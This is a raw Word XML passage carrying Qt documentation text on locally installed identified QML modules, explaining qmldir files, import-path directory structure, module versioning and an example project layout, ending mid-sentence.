    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="00522BA5">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="373" w:name="locally-installed-identified-modules"/>
      <w:bookmarkStart w:id="374" w:name="_Toc483000611"/>
      <w:bookmarkStart w:id="375" w:name="_Toc483003628"/>
      <w:bookmarkStart w:id="376" w:name="_Toc483603964"/>
      <w:bookmarkStart w:id="377" w:name="_Toc483605184"/>
      <w:bookmarkEnd w:id="373"/>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Locally Installed Identified</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modules</w:t>
      </w:r>
      <w:bookmarkEnd w:id="374"/>
      <w:bookmarkEnd w:id="375"/>
      <w:bookmarkEnd w:id="376"/>
      <w:bookmarkEnd w:id="377"/>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directory of QML and/or C++ files can be shared as an identified module if it contains a</w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId306" w:history="1">
        <w:r w:rsidRPr="00522BA5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmldir file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with the module metadata and is installed into the QML import path</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Any </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML file on the local file system can import this directory as a module by using an</w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId307" w:history="1">
        <w:r w:rsidRPr="00522BA5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>import</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>statement</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that refers to the module's URI, enabling the file to use the</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId308" w:history="1">
        <w:r w:rsidRPr="002A69FE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML object types</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId309" w:history="1">
        <w:r w:rsidRPr="002A69FE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript resources</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>defined by the module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The module's</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C472B3">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmldir</w:t>
      </w:r>
      <w:r w:rsidRPr="00C472B3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C472B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">file must </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reside in a directory structure within the</w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId310" w:anchor="qml-import-path" w:history="1">
        <w:r w:rsidRPr="00522BA5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>import path</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that reflects the URI dotted identifier string, where </w:t>
      </w:r>
      <w:r w:rsidRPr="00C472B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">each dot (".") in the identifier </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reflects a sub-level in the directory tree</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the</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qmldir</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file of the module</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com.mycompany.mymodule</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must be located in the sub-path</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com/mycompany/mymodule/qmldir</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>somewhere in the</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId311" w:anchor="qml-import-path" w:history="1">
        <w:r w:rsidRPr="002A69FE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>import path</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C472B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It is possible to store different versions of a module in subdirectories of its own.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> For example, a version 2.1 of a module could be located under</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com/mycompany/mymodule.2/qmldir</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</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com/mycompany/</w:t>
      </w:r>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mymodule.2.1</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/qmldir</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The engine will automatically load the module which matches best.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C472B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Alternatively, versioning for different types can be defined within a qmldir file itself</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C472B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>however this can make updating such a module more difficu</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lt (as a</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qmldir</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file merge must take place as part of the update procedure).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="00522BA5">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="378" w:name="an-example"/>
      <w:bookmarkStart w:id="379" w:name="_Toc483000612"/>
      <w:bookmarkStart w:id="380" w:name="_Toc483003629"/>
      <w:bookmarkStart w:id="381" w:name="_Toc483603965"/>
      <w:bookmarkStart w:id="382" w:name="_Toc483605185"/>
      <w:bookmarkEnd w:id="378"/>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An Example</w:t>
      </w:r>
      <w:bookmarkEnd w:id="379"/>
      <w:bookmarkEnd w:id="380"/>
      <w:bookmarkEnd w:id="381"/>
      <w:bookmarkEnd w:id="382"/>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Consider the following QML project directory structure. Under the top level directory</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myapp</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, there are a set of common UI components in a sub-directory named</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mycomponents</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and the main application code in a sub-directory named</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main</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRPr="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:before="180" w:after="37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t>myapp</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t xml:space="preserve">    </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 xml:space="preserve"> mycomponents</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t xml:space="preserve">        </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 xml:space="preserve"> CheckBox</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qml</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t xml:space="preserve">        </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 xml:space="preserve"> DialogBox</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qml</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t xml:space="preserve">        </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 xml:space="preserve"> Slider</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qml</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t xml:space="preserve">    </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 xml:space="preserve"> main</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t xml:space="preserve">        </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 xml:space="preserve"> application</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qml</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A69FE" w:rsidRDefault="002A69FE" w:rsidP="002A69FE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To make the</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mycomponents</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directory available as an identified module, the directory must include a</w:t>
      </w:r>
      <w:r w:rsidRPr="002A69FE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId312" w:history="1">
        <w:r w:rsidRPr="002A69FE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmldir file</w:t>
        </w:r>
      </w:hyperlink>
